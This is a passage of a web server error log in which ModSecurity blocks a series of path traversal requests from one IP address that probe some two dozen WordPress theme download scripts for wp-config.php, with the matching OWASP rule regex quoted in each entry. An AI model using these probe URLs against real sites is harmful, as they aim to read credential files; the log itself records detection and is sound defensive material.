"investigacionperu.com"] [uri "/wp-content/themes/g5_helium/down.php"] [unique_id "YtscenhurfgLch3PImzILgAAAMk"] [Fri Jul 22 16:54:02.279193 2022] [:error] [pid 23081:tid 140016982345472] [client 72.11.157.116:51792] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/hueman/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/hueman/down.php"] [unique_id "YtscenhurfgLch3PImzILwAAANM"] [Fri Jul 22 16:54:02.380537 2022] [:error] [pid 22471:tid 140017125021440] [client 72.11.157.116:51794] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/kayano/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/kayano/down.php"] [unique_id "YtsceuCtYZwatdwcM8Wq6AAAAEI"] [Fri Jul 22 16:54:02.471247 2022] [:error] [pid 22470:tid 140017015916288] [client 72.11.157.116:51796] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/pinboard/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/pinboard/down.php"] [unique_id "YtscenxqqtgWgIAXsGFhmAAAAA8"] [Fri Jul 22 16:54:02.569489 2022] [:error] [pid 22472:tid 140017032701696] [client 72.11.157.116:51798] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/startheme/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/startheme/down.php"] [unique_id "YtsceipbG8_UBGXeM63w7AAAAI0"] [Fri Jul 22 16:54:02.674589 2022] [:error] [pid 23081:tid 140017041094400] [client 72.11.157.116:51800] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/tplbs/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/tplbs/down.php"] [unique_id "YtscenhurfgLch3PImzIMAAAAMw"] [Fri Jul 22 16:54:02.780438 2022] [:error] [pid 23081:tid 140017007523584] [client 72.11.157.116:51804] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/godwinsgarage/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/godwinsgarage/framework/utilities/download/getfile.php"] [unique_id "YtscenhurfgLch3PImzIMgAAANA"] [Fri Jul 22 16:54:02.893664 2022] [:error] [pid 23081:tid 140016948774656] [client 72.11.157.116:51806] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/bergsoe/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/bergsoe/download.php"] [unique_id "YtscenhurfgLch3PImzIMwAAANc"] [Fri Jul 22 16:54:02.998072 2022] [:error] [pid 23081:tid 140017133414144] [client 72.11.157.116:51808] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/customizr/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/customizr/download.php"] [unique_id "YtscenhurfgLch3PImzINAAAAME"] [Fri Jul 22 16:54:03.088105 2022] [:error] [pid 22472:tid 140017057879808] [client 72.11.157.116:51812] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/Divi/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/Divi/download.php"] [unique_id "YtsceypbG8_UBGXeM63w7QAAAIo"] [Fri Jul 22 16:54:03.178646 2022] [:error] [pid 23081:tid 140017049487104] [client 72.11.157.116:51816] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/focustelecom/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/focustelecom/download.php"] [unique_id "Ytsce3hurfgLch3PImzINwAAAMs"] [Fri Jul 22 16:54:03.269559 2022] [:error] [pid 23081:tid 140017125021440] [client 72.11.157.116:51818] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/irmahulscher/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/irmahulscher/framework/utilities/download/getfile.php"] [unique_id "Ytsce3hurfgLch3PImzIOAAAAMI"] [Fri Jul 22 16:54:03.359610 2022] [:error] [pid 23081:tid 140017083057920] [client 72.11.157.116:51820] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/izerski/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/izerski/download.php"] [unique_id "Ytsce3hurfgLch3PImzIOQAAAMc"] [Fri Jul 22 16:54:03.465037 2022] [:error] [pid 22471:tid 140016948774656] [client 72.11.157.116:51822] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/kioskpolis/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/kioskpolis/download.php"] [unique_id "Ytsce-CtYZwatdwcM8Wq6QAAAFc"] [Fri Jul 22 16:54:03.580434 2022] [:error] [pid 23081:tid 140016957167360] [client 72.11.157.116:51824] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mantra/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mantra/download.php"] [unique_id "Ytsce3hurfgLch3PImzIOgAAANY"] [Fri Jul 22 16:54:03.670155 2022] [:error] [pid 22472:tid 140016973952768] [client 72.11.157.116:51826] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/melrose/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/melrose/download.php"] [unique_id "YtsceypbG8_UBGXeM63w7gAAAJQ"] [Fri Jul 22 16:54:03.761322 2022] [:error] [pid 22471:tid 140016965560064] [client 72.11.157.116:51828] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mtb/inc/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mtb/inc/download.php"] [unique_id "Ytsce-CtYZwatdwcM8Wq6gAAAFU"] [Fri Jul 22 16:54:03.861223 2022] [:error] [pid 22470:tid 140016990738176] [client 72.11.157.116:51830] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/niet/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/niet/download.php"] [unique_id "Ytsce3xqqtgWgIAXsGFhmQAAABI"] [Fri Jul 22 16:54:03.981706 2022] [:error] [pid 22470:tid 140017074665216] [client 72.11.157.116:51832] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/philippineartawards/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/philippineartawards/download.php"] [unique_id "Ytsce3xqqtgWgIAXsGFhmgAAAAg"] [Fri Jul 22 16:54:04.088114 2022] [:error] [pid 23081:tid 140017066272512] [client 72.11.157.116:51838] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/quies/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/quies/download.php"] [unique_id "YtscfHhurfgLch3PImzIPAAAAMk"] [Fri Jul 22 16:54:04.178116 2022] [:error] [pid 23081:tid 140016965560064] [client 72.11.157.116:51844] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/salutation/framework/utilities/download/getfile.php"] [unique_id "YtscfHhurfgLch3PImzIPQAAANU"] [Fri Jul 22 16:54:04.277185 2022] [:error] [pid 22471:tid 140017091450624] [client 72.11.157.116:51846] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/trinitytheme/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/trinitytheme/lib/downloadlink.php"] [unique_id "YtscfOCtYZwatdwcM8Wq6wAAAEY"] [Fri Jul 22 16:54:04.367387 2022] [:error] [pid 22470:tid 140016957167360] [client 72.11.157.116:51848] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/wohwiwebcenter-vdwbayern/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/wohwiwebcenter-vdwbayern/download.php"] [unique_id "YtscfHxqqtgWgIAXsGFhmwAAABY"] [Fri Jul 22 16:54:04.457443 2022] [:error] [pid 22470:tid 140017083057920] [client 72.11.157.116:51850] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: 